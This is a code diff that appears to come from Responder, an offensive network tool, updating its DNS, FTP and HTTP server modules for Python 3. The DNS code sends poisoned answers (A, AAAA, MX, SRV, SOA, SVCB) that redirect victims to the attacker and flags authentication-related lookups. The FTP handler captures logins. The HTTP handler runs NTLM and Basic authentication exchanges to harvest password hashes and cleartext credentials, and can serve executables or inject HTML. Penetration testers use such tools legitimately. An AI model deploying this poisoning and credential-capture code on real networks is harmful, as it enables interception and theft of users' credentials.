+				if offset + 10 > len(data):
+					return None
+				
+				rr_type = struct.unpack('>H', data[offset:offset+2])[0]
+				offset += 2
+				
+				if rr_type == 41:  # OPT record found
+					udp_payload_size = struct.unpack('>H', data[offset:offset+2])[0]
+					offset += 2
+					
+					# TTL field contains extended RCODE and flags
+					ttl_bytes = data[offset:offset+4]
+					extended_rcode = ttl_bytes[0]
+					edns_version = ttl_bytes[1]
+					flags = struct.unpack('>H', ttl_bytes[2:4])[0]
+					dnssec_ok = bool(flags & 0x8000)  # DO bit
+					offset += 4
+					
+					rdlength = struct.unpack('>H', data[offset:offset+2])[0]
+					offset += 2
+					
+					# RDATA contains option codes (we'll just skip for now)
+					rdata = data[offset:offset+rdlength] if rdlength > 0 else b''
+					
+					return {
+						'udp_size': udp_payload_size,
+						'extended_rcode': extended_rcode,
+						'edns_version': edns_version,
+						'dnssec_ok': dnssec_ok,
+						'rdata': rdata
+					}
+				else:
+					# Skip this RR
+					offset += 2  # class
+					offset += 4  # ttl
+					if offset + 2 > len(data):
+						return None
+					rdlength = struct.unpack('>H', data[offset:offset+2])[0]
+					offset += 2 + rdlength
+			
+			return None
+		
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[DNS] Error parsing OPT record: %s' % str(e)))
 			return None
 	
+	def should_respond(self, query_name, query_type):
+		"""Determine if we should respond to this DNS query"""
+		
+		# Don't respond to empty queries
+		if not query_name:
+			return False
+		
+		# Domain filtering - only respond to configured domain if set
+		if hasattr(settings.Config, 'DHCPv6_Domain') and settings.Config.DHCPv6_Domain:
+			target_domain = settings.Config.DHCPv6_Domain.lower().strip()
+			query_lower = query_name.lower().strip('.')
+			
+			# Check if query matches domain or is a subdomain
+			if not (query_lower == target_domain or query_lower.endswith('.' + target_domain)):
+				if settings.Config.Verbose:
+					print(text('[DNS] Ignoring query for %s (not in target domain %s)' % (
+						query_name, target_domain)))
+				return False
+			
+			# Log that we're responding to a filtered domain
+			if settings.Config.Verbose:
+				print(color('[DNS] Query matches target domain %s - responding' % target_domain, 3, 1))
+		
+		# For AAAA queries, only respond if we have a valid IPv6 address
+		# With link-local fallback, this should almost always succeed
+		# Only fails if IPv6 is completely disabled on the system
+		if query_type == 28:  # AAAA
+			ipv6 = self.get_ipv6_address()
+			if not ipv6:
+				return False
+		
+		# Respond to these query types:
+		# A (1), SOA (6), MX (15), TXT (16), AAAA (28), SRV (33), ANY (255)
+		# SVCB (64), HTTPS (65) - Service Binding records
+		supported_types = [1, 6, 15, 16, 28, 33, 64, 65, 255]
+		if query_type not in supported_types:
+			return False
+		
+		# Log interesting queries (authentication-related domains)
+		query_lower = query_name.lower()
+		interesting_patterns = ['login', 'auth', 'sso', 'portal', 'vpn', 'mail', 'smtp', 'imap', 'exchange', '_ldap', '_kerberos', '_gc', '_kpasswd', '_msdcs']
+		if any(pattern in query_lower for pattern in interesting_patterns):
+			SaveToDb({
+				'module': 'DNS',
+				'type': 'Interesting-Query',
+				'client': self.client_address[0].replace('::ffff:', ''),
+				'hostname': query_name,
+				'fullhash': query_name
+			})
+		
+		# Respond to everything that passed the filters
+		return True
+	
+	def build_response(self, transaction_id, query_name, query_type, query_class, original_data, opt_record=None):
+		"""Build DNS response packet with optional OPT record support"""
 		try:
-			data = self.request.recv(1024)
+			# DNS Header
+			response = transaction_id  # Transaction ID
+			
+			# Flags: Response, Authoritative, No error
+			flags = 0x8400  # Standard query response, authoritative
+			response += struct.pack('>H', flags)
+			
+			# Questions, Answers, Authority RRs, Additional RRs
+			response += struct.pack('>H', 1)  # 1 question
+			response += struct.pack('>H', 1)  # 1 answer
+			response += struct.pack('>H', 0)  # 0 authority
+			
+			# Additional RRs count (1 if we have OPT record)
+			additional_count = 1 if opt_record else 0
+			response += struct.pack('>H', additional_count)
+			
+			# Question section (copy from original query)
+			# Find question section in original data
+			question_start = 12
+			question_end = question_start
+			
+			# Skip to end of domain name
+			while question_end < len(original_data):
+				length = original_data[question_end]
+				if length == 0:
+					question_end += 5  # null byte + type (2) + class (2)
+					break
+				if (length & 0xC0) == 0xC0:
+					question_end += 6  # pointer (2) + type (2) + class (2)
+					break
+				question_end += length + 1
+			
+			question_section = original_data[question_start:question_end]
+			response += question_section
+			
+			# Answer section
+			# Name (pointer to question)
+			response += b'\xc0\x0c'  # Pointer to offset 12 (question name)
+			
+			# Type
+			response += struct.pack('>H', query_type)
+			
+			# Class
+			response += struct.pack('>H', query_class)
+			
+			# TTL (5 minutes for better caching while still allowing updates)
+			response += struct.pack('>I', 300)  # 300 seconds = 5 minutes
+			
+			# Get target IP for A records
+			target_ipv4 = self.get_ipv4_address()
+			
+			if query_type == 1:  # A record
+				# RDLENGTH
+				response += struct.pack('>H', 4)
+				# RDATA (IPv4 address)
+				response += socket.inet_aton(target_ipv4)
+			
+			elif query_type == 28:  # AAAA record
+				# Get proper IPv6 address (already validated in should_respond)
+				ipv6 = self.get_ipv6_address()
+				if not ipv6:
+					return None  # Should not happen if should_respond worked
+				
+				# RDLENGTH
+				response += struct.pack('>H', 16)
+				# RDATA (IPv6 address)
+				response += socket.inet_pton(socket.AF_INET6, ipv6)
+			
+			elif query_type == 6:  # SOA record (Start of Authority)
+				# Build SOA record to appear authoritative
+				# SOA format: MNAME RNAME SERIAL REFRESH RETRY EXPIRE MINIMUM
+				
+				# MNAME (primary nameserver) - pointer to query name
+				soa_data = b'\xc0\x0c'
+				
+				# RNAME (responsible party) - admin@<domain>
+				# Format: admin.<domain> (@ becomes .)
+				soa_data += b'\x05admin\xc0\x0c'  # admin + pointer to query name
+				
+				# SERIAL (zone serial number)
+				import time
+				serial = int(time.time()) % 2147483647  # Use timestamp as serial
+				soa_data += struct.pack('>I', serial)
+				
+				# REFRESH (32-bit seconds) - how often secondary checks for updates
+				soa_data += struct.pack('>I', 120)  # 2 minutes
+				
+				# RETRY (32-bit seconds) - retry interval if refresh fails
+				soa_data += struct.pack('>I', 60)  # 1 minute
+				
+				# EXPIRE (32-bit seconds) - when zone data becomes invalid
+				soa_data += struct.pack('>I', 300)  # 5 minutes
+				
+				# MINIMUM (32-bit seconds) - minimum TTL for negative caching
+				soa_data += struct.pack('>I', 60)  # 60 seconds
+				
+				response += struct.pack('>H', len(soa_data))
+				response += soa_data
+				
+				if settings.Config.Verbose:
+					print(color('[DNS] SOA record poisoned - appearing as authoritative', 3, 1))
+			
+			elif query_type == 15:  # MX record (mail server)
+				# Build MX record pointing to our server
+				# This captures SMTP auth attempts
+				mx_data = struct.pack('>H', 10)  # Priority 10
+				mx_data += b'\xc0\x0c'  # Pointer to query name (our server)
+				
+				response += struct.pack('>H', len(mx_data))
+				response += mx_data
+				
+				if settings.Config.Verbose:
+					print(color('[DNS] MX record poisoned - potential email auth capture', 3, 1))
+			
+			elif query_type == 16:  # TXT record
+				# Return a benign TXT record
+				txt_data = b'v=spf1 a mx ~all'  # SPF record
+				response += struct.pack('>H', len(txt_data) + 1)
+				response += struct.pack('B', len(txt_data))
+				response += txt_data
+			
+			elif query_type == 33:  # SRV record (service discovery)
+				# SRV format: priority, weight, port, target
+				# Determine correct port based on service name in query
+				srv_port = self.get_srv_port(query_name)
+				
+				srv_data = struct.pack('>HHH', 0, 0, srv_port)  # priority, weight, port
+				srv_data += b'\xc0\x0c'  # Target (pointer to query name)
+				
+				response += struct.pack('>H', len(srv_data))
+				response += srv_data
+				
+				if settings.Config.Verbose:
+					print(color('[DNS] SRV record poisoned: %s -> port %d' % (query_name, srv_port), 3, 1))
+			
+			elif query_type == 255:  # ANY query
+				# Respond with A record
+				response += struct.pack('>H', 4)
+				response += socket.inet_aton(target_ipv4)
+			
+			elif query_type == 64 or query_type == 65:  # SVCB (64) or HTTPS (65) record
+				# Service Binding records - respond with alias to same domain
+				# This tells clients to use A/AAAA records for the service
+				# SVCB format: priority, target, params
+				
+				# Priority 0 = AliasMode (just use A/AAAA of target)
+				svcb_data = struct.pack('>H', 0)  # Priority 0 (alias)
+				# Target: pointer to query name (use our domain)
+				svcb_data += b'\xc0\x0c'  # Pointer to query name
+				
+				response += struct.pack('>H', len(svcb_data))
+				response += svcb_data
+				
+				if settings.Config.Verbose:
+					record_type = 'HTTPS' if query_type == 65 else 'SVCB'
+					print(color('[DNS] %s record poisoned - alias mode' % record_type, 3, 1))
+			
+			# Add OPT record to additional section if client sent one
+			if opt_record:
+				response += self.build_opt_record(opt_record)
+			
+			return response
+		
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[DNS] Error building response: %s' % str(e)))
+			return None
+	
+	def build_opt_record(self, client_opt):
+		"""
+		Build OPT pseudo-RR for EDNS0 response
+		
+		This indicates our server supports EDNS0 extensions
+		"""
+		try:
+			opt_rr = b''
+			
+			# NAME: root domain (empty)
+			opt_rr += b'\x00'
+			
+			# TYPE: OPT (41)
+			opt_rr += struct.pack('>H', 41)
+			
+			# CLASS: UDP payload size we support (typically 4096 or 512)
+			# Match client's size or use reasonable default
+			udp_size = min(client_opt['udp_size'], 4096) if client_opt['udp_size'] > 512 else 4096
+			opt_rr += struct.pack('>H', udp_size)
+			
+			# TTL: Extended RCODE and flags
+			# Byte 0: Extended RCODE (0 = no error)
+			# Byte 1: EDNS version (0)
+			# Bytes 2-3: Flags (we don't set DNSSEC OK in response)
+			extended_rcode = 0
+			edns_version = 0
+			flags = 0  # No flags set (we don't support DNSSEC)
+			
+			opt_rr += struct.pack('B', extended_rcode)
+			opt_rr += struct.pack('B', edns_version)
+			opt_rr += struct.pack('>H', flags)
+			
+			# RDLENGTH: 0 (no additional options)
+			opt_rr += struct.pack('>H', 0)
+			
+			# RDATA: empty (no options)
+			
+			if settings.Config.Verbose:
+				print(color('[DNS] Added OPT record to response (EDNS0)', 4, 1))
+			
+			return opt_rr
+		
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[DNS] Error building OPT record: %s' % str(e)))
+			return b''
+	
+	def get_target_ip(self, query_type):
+		"""Get the target IP address for spoofed responses"""
+		if query_type == 28:  # AAAA
+			return self.get_ipv6_address()
+		else:  # A record and others
+			return self.get_ipv4_address()
+	
+	def get_ipv4_address(self):
+		"""Get IPv4 address for A record responses"""
+		# Priority 1: Use ExternalIP if set (-e option)
+		if hasattr(settings.Config, 'ExternalIP') and settings.Config.ExternalIP:
+			return settings.Config.ExternalIP
+		
+		# Priority 2: Use Bind_To (default)
+		return settings.Config.Bind_To
+	
+	def get_ipv6_address(self):
+		"""
+		Get IPv6 address for AAAA responses
+		
+		Returns the IPv6 address Responder is configured to use:
+		1. ExternalIP6 if set (-6 command line option)
+		2. Bind_To6 (already determined by FindLocalIP6 at startup)
+		
+		Does NOT return IPv4-mapped addresses (::ffff:x.x.x.x) or localhost.
+		"""
+		# Priority 1: Use ExternalIP6 if set (-6 command line option)
+		if hasattr(settings.Config, 'ExternalIP6') and settings.Config.ExternalIP6:
+			ipv6 = settings.Config.ExternalIP6
+			if ipv6 and ipv6 not in ('::1', '') and not ipv6.startswith('::ffff:'):
+				return ipv6
+		
+		# Priority 2: Use Bind_To6 (set by FindLocalIP6 at startup)
+		if hasattr(settings.Config, 'Bind_To6') and settings.Config.Bind_To6:
+			ipv6 = settings.Config.Bind_To6
+			if ipv6 and ipv6 not in ('::1', '::') and not ipv6.startswith('::ffff:'):
+				return ipv6
+		
+		# No valid IPv6 available
+		return None
+	
+	def get_type_name(self, query_type):
+		"""Convert query type number to name"""
+		types = {
+			1: 'A',
+			2: 'NS',
+			5: 'CNAME',
+			6: 'SOA',
+			12: 'PTR',
+			15: 'MX',
+			16: 'TXT',
+			28: 'AAAA',
+			33: 'SRV',
+			41: 'OPT',
+			64: 'SVCB',
+			65: 'HTTPS',
+			255: 'ANY'
+		}
+		return types.get(query_type, 'TYPE%d' % query_type)
+	
+	def get_srv_port(self, query_name):
+		"""
+		Determine the correct port for SRV record responses based on service name.
+		
+		SRV query format: _service._protocol.name
+		Examples:
+		  _ldap._tcp.dc._msdcs.domain.local → 389
+		  _kerberos._tcp.domain.local → 88
+		  _gc._tcp.domain.local → 3268
+		
+		Returns appropriate port for the service, defaults to 445 (SMB) if unknown.
+		"""
+		query_lower = query_name.lower()
+		
+		# Service to port mapping
+		# Format: (service_pattern, port)
+		srv_ports = [
+			# LDAP services
+			('_ldap._tcp', 389),
+			('_ldap._udp', 389),
+			('_ldaps._tcp', 636),
+			
+			# Kerberos services
+			('_kerberos._tcp', 88),
+			('_kerberos._udp', 88),
+			('_kerberos-master._tcp', 88),
+			('_kerberos-master._udp', 88),
+			('_kpasswd._tcp', 464),
+			('_kpasswd._udp', 464),
+			('_kerberos-adm._tcp', 749),
+			
+			# Global Catalog (Active Directory)
+			('_gc._tcp', 3268),
+			('_gc._ssl._tcp', 3269),
+			
+			# Web services
+			('_http._tcp', 80),
+			('_https._tcp', 443),
+			('_http._ssl._tcp', 443),
+			
+			# Email services
+			('_smtp._tcp', 25),
+			('_submission._tcp', 587),
+			('_imap._tcp', 143),
+			('_imaps._tcp', 993),
+			('_pop3._tcp', 110),
+			('_pop3s._tcp', 995),
+			
+			# File/Remote services
+			('_smb._tcp', 445),
+			('_cifs._tcp', 445),
+			('_ftp._tcp', 21),
+			('_sftp._tcp', 22),
+			('_ssh._tcp', 22),
+			('_telnet._tcp', 23),
+			('_rdp._tcp', 3389),
+			('_ms-wbt-server._tcp', 3389),  # RDP
+			
+			# Windows services
+			('_winrm._tcp', 5985),
+			('_winrm-ssl._tcp', 5986),
+			('_wsman._tcp', 5985),
+			('_ntp._udp', 123),
+			
+			# Database services
+			('_mssql._tcp', 1433),
+			('_mysql._tcp', 3306),
+			('_postgresql._tcp', 5432),
+			('_oracle._tcp', 1521),
+			
+			# SIP/VoIP
+			('_sip._tcp', 5060),
+			('_sip._udp', 5060),
+			('_sips._tcp', 5061),
+			
+			# XMPP/Jabber
+			('_xmpp-client._tcp', 5222),
+			('_xmpp-server._tcp', 5269),
+			
+			# Other
+			('_finger._tcp', 79),
+			('_ipp._tcp', 631),  # Internet Printing Protocol
+		]
+		
+		# Check each pattern
+		for pattern, port in srv_ports:
+			if query_lower.startswith(pattern):
+				return port
+		
+		# Default to SMB port for unknown services
+		# This is a reasonable default for credential capture
+		return 445
 
-			if ParseDNSType(data) and settings.Config.AnalyzeMode is False:
-				buff = DNS_Ans()
-				buff.calculate(data)
-				self.request.send(str(buff))
 
-				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
-				print color("[*] [DNS-TCP] Poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1)
-
-		except Exception:
-			pass
+class DNSTCP(BaseRequestHandler):
+	"""
+	DNS over TCP server
+	Handles TCP-based DNS queries (zone transfers, large responses)
+	"""
+	
+	def handle(self):
+		try:
+			# TCP DNS messages are prefixed with 2-byte length
+			length_data = self.request.recv(2)
+			if len(length_data) < 2:
+				return
+			
+			msg_length = struct.unpack('>H', length_data)[0]
+			
+			# Receive the DNS message
+			data = b''
+			while len(data) < msg_length:
+				chunk = self.request.recv(msg_length - len(data))
+				if not chunk:
+					return
+				data += chunk
+			
+			if len(data) < 12:
+				return
+			
+			# Parse DNS header
+			transaction_id = data[0:2]
+			flags = struct.unpack('>H', data[2:4])[0]
+			questions = struct.unpack('>H', data[4:6])[0]
+			answer_rrs = struct.unpack('>H', data[6:8])[0]
+			authority_rrs = struct.unpack('>H', data[8:10])[0]
+			additional_rrs = struct.unpack('>H', data[10:12])[0]
+			
+			# Check if it's a query
+			if flags & 0x8000:
+				return
+			
+			# Create DNS instance to reuse parsing logic
+			dns_handler = DNS.__new__(DNS)
+			dns_handler.client_address = self.client_address
+			
+			# Parse question
+			query_name, query_type, query_class, offset = dns_handler.parse_question(data, 12)
+			
+			if not query_name:
+				return
+			
+			# Check for OPT record
+			opt_record = None
+			if additional_rrs > 0:
+				opt_record = dns_handler.parse_opt_record(data, offset)
+			
+			# Log the query
+			if settings.Config.Verbose:
+				query_type_name = dns_handler.get_type_name(query_type)
+				opt_info = ''
+				if opt_record:
+					opt_info = ' [EDNS0: UDP=%d]' % opt_record['udp_size']
+				print(text('[DNS-TCP] Query from %s: %s (%s)%s' % (
+					self.client_address[0].replace('::ffff:', ''),
+					query_name,
+					query_type_name,
+					opt_info
+				)))
+			
+			# Check if we should respond
+			if not dns_handler.should_respond(query_name, query_type):
+				return
+			
+			# Build response
+			response = dns_handler.build_response(
+				transaction_id,
+				query_name,
+				query_type,
+				query_class,
+				data,
+				opt_record
+			)
+			
+			if response:
+				# Prefix with length for TCP
+				tcp_response = struct.pack('>H', len(response)) + response
+				self.request.sendall(tcp_response)
+				
+				target_ip = dns_handler.get_target_ip(query_type)
+				if target_ip:
+					print(color('[DNS-TCP] Poisoned response: %s -> %s' % (
+						query_name, target_ip), 2, 1))
+		
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[DNS-TCP] Error: %s' % str(e)))

servers/FTP.py

@@ -15,28 +15,30 @@
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 from utils import *
-from SocketServer import BaseRequestHandler
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
 from packets import FTPPacket
 
 class FTP(BaseRequestHandler):
 	def handle(self):
 		try:
-			self.request.send(str(FTPPacket()))
+			self.request.send(NetworkSendBufferPython2or3(FTPPacket()))
 			data = self.request.recv(1024)
 
-			if data[0:4] == "USER":
-				User = data[5:].strip()
+			if data[0:4] == b'USER':
+				User = data[5:].strip().decode("latin-1")
 
 				Packet = FTPPacket(Code="331",Message="User name okay, need password.")
-				self.request.send(str(Packet))
+				self.request.send(NetworkSendBufferPython2or3(Packet))
 				data = self.request.recv(1024)
 
-			if data[0:4] == "PASS":
-				Pass = data[5:].strip()
-
+			if data[0:4] == b'PASS':
+				Pass = data[5:].strip().decode("latin-1")
 				Packet = FTPPacket(Code="530",Message="User not logged in.")
-				self.request.send(str(Packet))
-				data = self.request.recv(1024)
+				self.request.send(NetworkSendBufferPython2or3(Packet))
 
 				SaveToDb({
 					'module': 'FTP', 
@@ -49,8 +51,9 @@ class FTP(BaseRequestHandler):
 
 			else:
 				Packet = FTPPacket(Code="502",Message="Command not implemented.")
-				self.request.send(str(Packet))
+				self.request.send(NetworkSendBufferPython2or3(Packet))
 				data = self.request.recv(1024)
 
 		except Exception:
+			self.request.close()
 			pass

servers/HTTP.py

@@ -14,42 +14,46 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from SocketServer import BaseRequestHandler, StreamRequestHandler
-from base64 import b64decode
 import struct
+import codecs
 from utils import *
-
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler, StreamRequestHandler
+else:
+	from SocketServer import BaseRequestHandler, StreamRequestHandler
+from base64 import b64decode, b64encode
 from packets import NTLM_Challenge
-from packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans
+from packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans,WEBDAV_Options_Answer
 from packets import WPADScript, ServeExeFile, ServeHtmlFile
 
 
 # Parse NTLMv1/v2 hash.
-def ParseHTTPHash(data, client, module):
+def ParseHTTPHash(data, Challenge, client, module):
 	LMhashLen    = struct.unpack('<H',data[12:14])[0]
 	LMhashOffset = struct.unpack('<H',data[16:18])[0]
-	LMHash       = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
+	LMHash       = data[LMhashOffset:LMhashOffset+LMhashLen]
+	LMHashFinal  = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
 	
 	NthashLen    = struct.unpack('<H',data[20:22])[0]
 	NthashOffset = struct.unpack('<H',data[24:26])[0]
-	NTHash       = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
-	
+	NTHash       = data[NthashOffset:NthashOffset+NthashLen]
+	NTHashFinal  = codecs.encode(NTHash, 'hex').upper().decode('latin-1')
 	UserLen      = struct.unpack('<H',data[36:38])[0]
 	UserOffset   = struct.unpack('<H',data[40:42])[0]
-	User         = data[UserOffset:UserOffset+UserLen].replace('\x00','')
-
+	User         = data[UserOffset:UserOffset+UserLen].decode('latin-1').replace('\x00','')
+	Challenge1    = codecs.encode(Challenge,'hex').decode('latin-1')
 	if NthashLen == 24:
 		HostNameLen     = struct.unpack('<H',data[46:48])[0]
 		HostNameOffset  = struct.unpack('<H',data[48:50])[0]
-		HostName        = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
-		WriteHash       = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, settings.Config.NumChal)
+		HostName        = data[HostNameOffset:HostNameOffset+HostNameLen].decode('latin-1').replace('\x00','')
+		WriteHash       = '%s::%s:%s:%s:%s' % (User, HostName, LMHashFinal, NTHashFinal, Challenge1)
 		SaveToDb({
 			'module': module, 
 			'type': 'NTLMv1', 
 			'client': client, 
 			'host': HostName, 
 			'user': User, 
-			'hash': LMHash+":"+NTHash, 
+			'hash': LMHashFinal+':'+NTHashFinal, 
 			'fullhash': WriteHash,
 		})
 
@@ -57,19 +61,18 @@ def ParseHTTPHash(data, client, module):
 		NthashLen      = 64
 		DomainLen      = struct.unpack('<H',data[28:30])[0]
 		DomainOffset   = struct.unpack('<H',data[32:34])[0]
-		Domain         = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
+		Domain         = data[DomainOffset:DomainOffset+DomainLen].decode('latin-1').replace('\x00','')
 		HostNameLen    = struct.unpack('<H',data[44:46])[0]
 		HostNameOffset = struct.unpack('<H',data[48:50])[0]
-		HostName       = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
-		WriteHash      = '%s::%s:%s:%s:%s' % (User, Domain, settings.Config.NumChal, NTHash[:32], NTHash[32:])
-                 
+		HostName       = data[HostNameOffset:HostNameOffset+HostNameLen].decode('latin-1').replace('\x00','')
+		WriteHash      = '%s::%s:%s:%s:%s' % (User, Domain, Challenge1, NTHashFinal[:32], NTHashFinal[32:])
 		SaveToDb({
 			'module': module, 
 			'type': 'NTLMv2', 
 			'client': client, 
 			'host': HostName, 
 			'user': Domain + '\\' + User,
-			'hash': NTHash[:32] + ":" + NTHash[32:],
+			'hash': NTHashFinal[:32] + ':' + NTHashFinal[32:],
 			'fullhash': WriteHash,
 		})
 
@@ -79,27 +82,17 @@ def GrabCookie(data, host):
 	if Cookie:
 		Cookie = Cookie.group(0).replace('Cookie: ', '')
 		if len(Cookie) > 1 and settings.Config.Verbose:
-			print text("[HTTP] Cookie           : %s " % Cookie)
+			print(text("[HTTP] Cookie           : %s " % Cookie))
 		return Cookie
 	return False
 
-def GrabHost(data, host):
-	Host = re.search(r'(Host:*.\=*)[^\r\n]*', data)
-
-	if Host:
-		Host = Host.group(0).replace('Host: ', '')
-		if settings.Config.Verbose:
-			print text("[HTTP] Host             : %s " % color(Host, 3))
-		return Host
-	return False
-
 def GrabReferer(data, host):
 	Referer = re.search(r'(Referer:*.\=*)[^\r\n]*', data)
 
 	if Referer:
 		Referer = Referer.group(0).replace('Referer: ', '')
 		if settings.Config.Verbose:
-			print text("[HTTP] Referer         : %s " % color(Referer, 3))
+			print(text("[HTTP] Referer         : %s " % color(Referer, 3)))
 		return Referer
 	return False
 
@@ -111,19 +104,33 @@ def WpadCustom(data, client):
 		return str(Buffer)
 	return False
 
+def IsWebDAV(data):
+        dav = re.search('PROPFIND', data)
+        if dav:
+              return True
+        else:
+              return False
+
+def ServeOPTIONS(data):
+	WebDav= re.search('OPTIONS', data)
+	if WebDav:
+		Buffer = WEBDAV_Options_Answer()
+		return str(Buffer)
+
+	return False
+
 def ServeFile(Filename):
 	with open (Filename, "rb") as bk:
-		return bk.read()
+		return NetworkRecvBufferPython2or3(bk.read())
 
 def RespondWithFile(client, filename, dlname=None):
-	
 	if filename.endswith('.exe'):
 		Buffer = ServeExeFile(Payload = ServeFile(filename), ContentDiFile=dlname)
 	else:
 		Buffer = ServeHtmlFile(Payload = ServeFile(filename))
 
 	Buffer.calculate()
-	print text("[HTTP] Sending file %s to %s" % (filename, client))
+	print(text("[HTTP] Sending file %s to %s" % (filename, client)))
 	return str(Buffer)
 
 def GrabURL(data, host):
@@ -132,17 +139,18 @@ def GrabURL(data, host):
 	POSTDATA = re.findall(r'(?<=\r\n\r\n)[^*]*', data)
 
 	if GET and settings.Config.Verbose:
-		print text("[HTTP] GET request from: %-15s  URL: %s" % (host, color(''.join(GET), 5)))
+		print(text("[HTTP] GET request from: %-15s  URL: %s" % (host, color(''.join(GET), 5))))
 
 	if POST and settings.Config.Verbose:
-		print text("[HTTP] POST request from: %-15s  URL: %s" % (host, color(''.join(POST), 5)))
+		print(text("[HTTP] POST request from: %-15s  URL: %s" % (host, color(''.join(POST), 5))))
 
 		if len(''.join(POSTDATA)) > 2:
-			print text("[HTTP] POST Data: %s" % ''.join(POSTDATA).strip())
+			print(text("[HTTP] POST Data: %s" % ''.join(POSTDATA).strip()))
 
 # Handle HTTP packet sequence.
-def PacketSequence(data, client):
+def PacketSequence(data, client, Challenge):
 	NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+	NTLM_Auth2 = re.findall(r'(?<=Authorization: Negotiate )[^\r]*', data)
 	Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)
 
 	# Serve the .exe if needed
@@ -154,115 +162,159 @@ def PacketSequence(data, client):
 		return RespondWithFile(client, settings.Config.Html_Filename)
 
 	WPAD_Custom = WpadCustom(data, client)
-	
+        # Webdav
+	if ServeOPTIONS(data):
+		return ServeOPTIONS(data)
+
 	if NTLM_Auth:
 		Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
-
-		if Packet_NTLM == "\x01":
+		if Packet_NTLM == b'\x01':
 			GrabURL(data, client)
-			GrabReferer(data, client)
-			GrabHost(data, client)
+			#GrabReferer(data, client)
 			GrabCookie(data, client)
 
-			Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
+			Buffer = NTLM_Challenge(ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
 			Buffer.calculate()
 
-			Buffer_Ans = IIS_NTLM_Challenge_Ans()
-			Buffer_Ans.calculate(str(Buffer))
+			Buffer_Ans = IIS_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
+			Buffer_Ans.calculate()
+			return Buffer_Ans
 
-			return str(Buffer_Ans)
-
-		if Packet_NTLM == "\x03":
+		if Packet_NTLM == b'\x03':
 			NTLM_Auth = b64decode(''.join(NTLM_Auth))
-			ParseHTTPHash(NTLM_Auth, client, "HTTP")
+			if IsWebDAV(data):
+                                 module = "WebDAV"
+			else:
+                                 module = "HTTP"
+			ParseHTTPHash(NTLM_Auth, Challenge, client, module)
 
 			if settings.Config.Force_WPAD_Auth and WPAD_Custom:
-				print text("[HTTP] WPAD (auth) file sent to %s" % client)
+				print(text("[HTTP] WPAD (auth) file sent to %s" % client.replace("::ffff:","")))
 
 				return WPAD_Custom
 			else:
 				Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
 				Buffer.calculate()
-				return str(Buffer)
+				return Buffer
+				
+	elif NTLM_Auth2:
+		Packet_NTLM = b64decode(''.join(NTLM_Auth2))[8:9]
+		if Packet_NTLM == b'\x01':
+			GrabURL(data, client)
+			#GrabReferer(data, client)
+			GrabCookie(data, client)
+
+			Buffer = NTLM_Challenge(ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+			Buffer.calculate()
+			Buffer_Ans = IIS_NTLM_Challenge_Ans(WWWAuth = "WWW-Authenticate: Negotiate ", Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
+			Buffer_Ans.calculate()
+			return Buffer_Ans
+
+		if Packet_NTLM == b'\x03':
+			NTLM_Auth = b64decode(''.join(NTLM_Auth2))
+			if IsWebDAV(data):
+                                 module = "WebDAV"
+			else:
+                                 module = "HTTP"
+			ParseHTTPHash(NTLM_Auth, Challenge, client, module)
+
+			if settings.Config.Force_WPAD_Auth and WPAD_Custom:
+				print(text("[HTTP] WPAD (auth) file sent to %s" % client.replace("::ffff:","")))
+
+				return WPAD_Custom
+			else:
+				Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
+				Buffer.calculate()
+				return Buffer
 
 	elif Basic_Auth:
 		ClearText_Auth = b64decode(''.join(Basic_Auth))
 
 		GrabURL(data, client)
-		GrabReferer(data, client)
-		GrabHost(data, client)
+		#GrabReferer(data, client)
 		GrabCookie(data, client)
 
 		SaveToDb({
 			'module': 'HTTP', 
 			'type': 'Basic', 
 			'client': client, 
-			'user': ClearText_Auth.split(':')[0], 
-			'cleartext': ClearText_Auth.split(':')[1], 
-		})
+			'user': ClearText_Auth.decode('latin-1').split(':', maxsplit=1)[0], 
+			'cleartext': ClearText_Auth.decode('latin-1').split(':', maxsplit=1)[1], 
+			})
 
 		if settings.Config.Force_WPAD_Auth and WPAD_Custom:
 			if settings.Config.Verbose:
-				print text("[HTTP] WPAD (auth) file sent to %s" % client)
+				print(text("[HTTP] WPAD (auth) file sent to %s" % client.replace("::ffff:","")))
 
 			return WPAD_Custom
 		else:
 			Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
 			Buffer.calculate()
-			return str(Buffer)
+			return Buffer
 	else:
 		if settings.Config.Basic:
-			Response = IIS_Basic_401_Ans()
+			r = IIS_Basic_401_Ans()
+			r.calculate()
+			Response = r
 			if settings.Config.Verbose:
-				print text("[HTTP] Sending BASIC authentication request to %s" % client)
